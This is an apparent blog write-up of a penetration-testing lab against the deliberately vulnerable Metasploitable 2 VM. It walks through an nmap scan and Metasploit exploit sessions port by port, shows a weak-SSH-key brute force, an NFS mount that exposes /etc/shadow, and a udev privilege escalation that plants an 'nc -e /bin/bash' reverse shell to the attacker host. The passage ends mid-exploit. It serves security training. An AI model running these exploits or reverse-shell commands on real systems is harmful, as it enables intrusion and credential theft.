Pentest lab – Metasploitable 2

Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable?

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154.
Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans.
Let’s start by port scanning the target with nmap. I did a full port, aggresive scan against the target. Here are the results.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
nmap -p1-65535 -A 192.168.127.154

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-03 21:33 EEST
Nmap scan report for 192.168.127.154
Host is up (0.00047s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after: 2010-04-16T13:07:45+00:00
|_ssl-date: 2014-06-03T18:35:26+00:00; -1s from local time.
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 46385/tcp mountd
| 100005 1,2,3 47809/udp mountd
| 100021 1,3,4 47120/udp nlockmgr
| 100021 1,3,4 53013/tcp nlockmgr
| 100024 1 34130/tcp status
|_ 100024 1 45305/udp status
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open java-rmi Java RMI Registry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 46385/tcp mountd
| 100005 1,2,3 47809/udp mountd
| 100021 1,3,4 47120/udp nlockmgr
| 100021 1,3,4 53013/tcp nlockmgr
| 100024 1 34130/tcp status
|_ 100024 1 45305/udp status
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 53
| Version: .0.51a-3ubuntu5
| Thread ID: 8
| Capabilities flags: 43564
| Some Capabilities: ConnectWithDatabase, SwitchToSSLAfterHandshake, Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag
| Status: Autocommit
|_ Salt: (eFoz:O^m'yLR5Qw&RJ
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
| irc-info:
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| servers: 1
| users: 1
| lservers: 0
| lusers: 1
| uptime: 0 days, 0:07:28
| source host: 7FA0EA81.B1DFC955.FFFA6D49.IP
|_ source ident: nmap
6697/tcp open irc Unreal ircd
8009/tcp open ajp13?
| ajp-auth:
|_ ERROR: Failed to connect to AJP server
| ajp-methods:
|_ ERROR: Failed to connect to server
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34130/tcp open status 1 (RPC #100024)
46385/tcp open mountd 1-3 (RPC #100005)
50867/tcp open unknown
53013/tcp open nlockmgr 1-4 (RPC #100021)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 46385/tcp mountd
| 100005 1,2,3 47809/udp mountd
| 100021 1,3,4 47120/udp nlockmgr
| 100021 1,3,4 53013/tcp nlockmgr
| 100024 1 34130/tcp status
|_ 100024 1 45305/udp status
MAC Address: 00:0C:29:2E:6D:70 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2014-06-03T14:35:26-04:00

TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.127.154

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 284.64 seconds

Ok, there are plenty of services just waiting for our attention. So let’s check each port and see what we get.

Port 21 vsftpd

There is an exploit available in Metasploit for the vsftpd version.

1
2
3
4
5
6
7
8
msf > search vsftpd

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution

The description from Rapid7 site:
VSFTPD v2.3.4 Backdoor Command Execution

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Let’s leverage it and get a shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/interact normal Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.127.154 yes The target address
RPORT 21 yes The target port


Payload options (cmd/unix/interact):

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.127.159:57936 -> 192.168.127.154:6200) at 2014-06-03 22:42:36 +0300

whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Aaand we own the machine! Now let’s move on.

Port 22 ssh

The OpenSSL package installed on the system is vulnerable to a bruteforce exploit due to a random number generator weakness. Here’s the overview and the CVE number:
CVE-2008-0166

OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable > numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.

I chose the following Ruby exploit:
http://www.exploit-db.com/exploits/5632/
Before running it, you have to download the precalculated vulnerable keys from:
http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 # for dsa keys
http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 # for rsa keys
Then I ran the script as follows:

1
ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/

You can consult the source for more information, basically this checks if the root account has a weak SSH key, testing each key in the directory where you placed the keys. Upon a hit, you will see something like this:

1
2
3
KEYFILE FOUND:

57c3115d77c56390332dc5c49978627a-5429

After finding the key, you can use it to log in as root via ssh:

1
ssh -l root -p 22 -i 57c3115d77c56390332dc5c49978627a-5429 192.168.127.154

Port 23 telnet

For this one I used an auxiliary module:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
RPORT 23 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the Telnet probe
USERNAME no The username to authenticate as

msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(telnet_version) > run

[*] 192.168.127.154:23 TELNET _ _ _ _ _ _ ____ x0a _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ x0a| '_ ` _ / _ __/ _` / __| '_ | |/ _ | | __/ _` | '_ | |/ _ __) |x0a| | | | | | __/ || (_| __ |_) | | (_) | | || (_| | |_) | | __// __/ x0a|_| |_| |_|___|____,_|___/ .__/|_|___/|_|____,_|_.__/|_|___|_____|x0a |_| x0ax0ax0aWarning: Never expose this VM to an untrusted network!x0ax0aContact: msfdev[at]metasploit.comx0ax0aLogin with msfadmin/msfadmin to get startedx0ax0ax0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So now we know the credentials for the msfadmin account, and if you log in and play around you will find out that this accound has sudo privilege, so it’s possible to run commands as root.

Port 80 apache

Navigating to the root of the web server, we can see some vulnerable web applications, along with the msfadmin account details which we got earlier with telnet. I won’t go over the web applications here, because I am focusing on host based exploitation in this post. However, I found out that I could use Metasploit against one of them to get a shell, so I will detail that here.
The Nessus scan revealed that the TWiki web application is vulnerable to remote code execution. I found the following suitable exploit:
TWiki History TWikiUsers rev Parameter Command Execution

This module exploits a vulnerability in the history component of TWiki. By passing a ‘rev’ parameter containing shell metacharacters to the TWikiUsers script, an attacker can execute arbitrary OS commands.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
msf > use exploit/unix/webapp/twiki_history
msf exploit(twiki_history) > show options

Module options (exploit/unix/webapp/twiki_history):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
URI /twiki/bin yes TWiki bin directory path
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(twiki_history) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(twiki_history) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(twiki_history) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ZeiYbclsufvu4LGM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Successfully sent exploit request
[*] Reading from socket B
[*] B: "ZeiYbclsufvu4LGMrn"
[*] Matching...
[*] A is input...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo D0Yvs2n6TnTUDmPF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2014-06-08 17:31:48 +0300
[*] Reading from socket B
[*] B: "D0Yvs2n6TnTUDmPFrn"
[*] Matching...
[*] A is input...

whoami
www-data

This is a low privilege shell, but we can escalate to root via the udev exploit, as shown later.

Port 445 samba

First, I’ll use an auxiliary module to get the server’s version:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(smb_version) > run

[*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With that information in hand, we can now use a suitable exploit against the target:
Samba “username map script” Command Execution

This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(usermap_script) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.127.154 yes The target address
RPORT 139 yes The target port


Payload options (cmd/unix/reverse):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(usermap_script) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo f8rjvIDZRdKBtu0F;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "f8rjvIDZRdKBtu0Frn"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:46653) at 2014-06-04 22:23:23 +0300

whoami
root

Port 514 tcpwrapped

The nmap scan revealed the port is open but it’s tcpwrapped. Let’s first see what that means:

TCP Wrapper is a host-based networking access control list system, used to filter network access to Internet Protocol servers on (Unix- like) operating systems such as Linux or BSD. (Wikipedia)

So we can conclude the port is protected by TCP Wrapper. If we try to netcat to the port, we see this:

1
2
3
nc -vvn 192.168.127.154 514

(UNKNOWN) [192.168.127.154] 514 (shell) open

I ran a Nessus scan against the target, and according to the report, a critical vulnerability is present on this port:
rsh Unauthenticated Access (via finger Information)
Synopsis
It was possible to log on this machine without password.
Description
Using common usernames as well as the usernames reported by ‘finger’, Nessus was able to log in through rsh. Either the accounts are not protected by passwords or the ~/.rhosts files are not configured properly.
This vulnerability is confirmed to exist in Cisco Prime LAN Management Solution, but could be present on any host that is not securely configured.
Port
tcp/514
So all we have to do is log in via the remote shell program:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
rsh 192.168.127.154

Last login: Wed May 7 11:00:37 EDT 2014 from :0.0 on pts/0

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have mail.

root@metasploitable:~#

Port 1099 java-rmi

Let’s continue our exploitation. Anything labeled Java is bound to be interesting from a security perspective 🙂
Searching for Java exploits yielded something interesting:
Java RMI Server Insecure Default Configuration Java Code Execution

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
msf > use exploit/multi/misc/java_rmi_server  
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1099 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)


Exploit target:

Id Name
-- ----
0 Generic (Java Payload)

msf exploit(java_rmi_server) > set RHOST 192.168.127.154
RHOST => 192.168.127.154

msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.127.154 yes The target address
RPORT 1099 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Generic (Java Payload)


msf exploit(java_rmi_server) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(java_rmi_server) > exploit

[*] Started reverse handler on 192.168.127.159:4444
[*] Using URL: http://0.0.0.0:8080/oVUJAkfU
[*] Local IP: http://192.168.127.159:8080/oVUJAkfU
[*] Connected and sending request for http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar
[*] 192.168.127.154 java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 192.168.127.154
[*] Meterpreter session 2 opened (192.168.127.159:4444 -> 192.168.127.154:36965) at 2014-06-04 22:42:17 +0300
[+] Target 192.168.127.154:1099 may be exploitable...
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter >

Port 1524 shell

Well, not much to say here. There’s already a nice, cozy shell waiting for connections, so nothing extra needs to be done.

Port 2049 nfs

Let’s use the the showmount command to see the NFS server’s export list. This command displays mount information for an NFS server. The -e flag is for showing exports:

1
2
3
4
5
showmount -e 192.168.127.154

Export list for 192.168.127.154:

/ *

How nice! The root directory is shared. So, let’s mount it then:

1
2
3
mkdir /metafs # this will be the mount point

mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking

Now we can read the passwords and everything else:

1
2
3
4
5
cat /metafs/etc/shadow

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::

..........etc..........

Port 3306 mysql

The Nessus scan that I ran against the target revealed the following:
MySQL Unpassworded Account Check
Synopsis
The remote database server can be accessed without a password.
Description
It is possible to connect to the remote MySQL database server using an unpassworded account. This may allow an attacker to launch further attacks against the database.
The ‘root’ account does not have a password. Here is the list of databases on the remote server : – information_schema – dvwa – metasploit – mysql – owasp10 – tikiwiki – tikiwiki195
Let’s see if we can indeed connect to the database as root without a password:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mysql -u root -p -h 192.168.127.154
Enter password:
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

mysql>

Now we can look inside the databases and get any data that might interest us.

Port 3632 distccd

distccd is the server for the distcc distributed compiler. It accepts and runs compilation jobs for network clients. Metasploit has an exploit avaiable for this:
DistCC Daemon Command Execution

This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port


Exploit target:

Id Name
-- ----
0 Automatic Target


msf exploit(distcc_exec) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.127.154 yes The target address
RPORT 3632 yes The target port


Payload options (cmd/unix/reverse):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic Target


msf exploit(distcc_exec) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo VhuwDGXAoBmUMNcg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "VhuwDGXAoBmUMNcgrn"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:52283) at 2014-06-05 21:34:46 +0300

whoami
daemon

So we have a low privilege account. Time for some local privilege escalation. I will use this exploit: http://www.exploit-db.com/exploits/8572/
Description
udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.
Usage
Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].
The exploit will execute /tmp/run as root so throw whatever payload you want in there.
Ok, on the command line on the victim, I looked for netcat and fortunately, it’s installed:

1
2
whereis nc
nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz

So I will compile the exploit and send it over netcat. I am on a 64 bit Kali and the target is 32 bit, so I compile it explicitly for 32 bit:

1
2
gcc -m32 8572.c -o 8572
nc -vv -l -p 5555 < 8572

From the victim, I go to the /tmp/ directory and grab the exploit from the attacking machine:

1
nc -v -n 192.168.127.159 5555 > 8572

Next, let’s look for the PID:

1
cat /proc/net/netlink

And the relevant line is:

1
2
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
df8cc200 15 2767 00000001 0 0 00000000 2

Check that this is the correct PID by looking at the udev service:

1
2
ps aux | grep udev
root 2768 0.0 0.1 2092 620 ? S<s 14:11 0:00 /sbin/udevd --daemon

It appears to be the right one (2768 – 1 = 2767)
Next, put some payload in /tmp/run, since that will be executed by the exploit. I will use netcat to connect to the atacker machine and give it a shell:

1
2
echo '#!/bin/bash' > /tmp/run
echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run

On the attacker machine, listen on port 5555:

1
nc -v -l -p 5555

And on the victim machine, now that all is set up, I just make the exploit executable and run it:

1
2
chmod +x 8572
./8572 2767

Now check our local netcat listener for the root shell:

1
2
3
nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539]
whoami
root

A bit on effort on that one, but all the more rewarding! Let’s move on.

Port 5432 postgresql

Since I already saw earlier that the mysql database wasn’t password protected, I will try a bruteforce auxiliary module to see if I can get in this one.
PostgreSQL Login Utility

This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target address range or CIDR identifier
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME postgres no A specific username to authenticate as
USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_user.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts


msf auxiliary(postgres_login) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(postgres_login) > run

[*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.127.154:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] 192.168.127.154:5432 Postgres - Disconnected
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So it’s possible to log in to this database like earlier with mysql, but I searched through Metasploit’s available exploits, and I stumbled upon one that can further the exploitation:
PostgreSQL for Linux Payload Execution

On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries’s om there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object’s constructor, it does not need to conform to specific Postgres API versions.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD no The password for the specified username. Leave blank for a random password.
RHOST yes The target address
RPORT 5432 yes The target port
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose output


Exploit target:

Id Name
-- ----
0 Linux x86

msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(postgres_payload) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > exploit

